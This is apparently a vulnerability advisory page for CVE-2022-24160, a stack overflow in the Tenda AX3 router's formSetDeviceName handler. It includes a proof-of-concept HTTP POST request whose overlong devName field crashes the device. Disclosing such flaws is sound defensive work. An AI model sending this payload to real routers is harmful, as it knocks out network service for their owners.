Headline
CVE-2022-24160: my_vuln/32.md at main · pjqwudi/my_vuln
Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetDeviceName. This vulnerability allows attackers to cause a Denial of Service (DoS) via the devName parameter.
Tenda Vulnerability
Vendor:Tenda
Product:AX3
Version:V16.03.12.10_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)
Type:Stack Overflow
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.
Stack Overflow
In httpd binary:
In formSetDeviceName function, devName is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the devName to execute arbitrary code.
As you can see here, the input has not been checked. In set_device_name function, the parameter devName is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.
Supplement
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
The parameter
macdoes not cause a buffer overflow because its length is limited to 20 in the functionlower_mac.
In libcommonprod.so binary:
PoC
We set devName as aaaaaaaaaaaaa… , and the router will crash, such as:
The string needs to contain \r, otherwise the vulnerability cannot be triggered
POST /goform/SetOnlineDevName HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 330 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/parental_control.html?random=0.6900448104060756& Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0smscvb
devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=e0:be:03:25:12:36
Result
The target router crashes and cannot provide services correctly and persistently.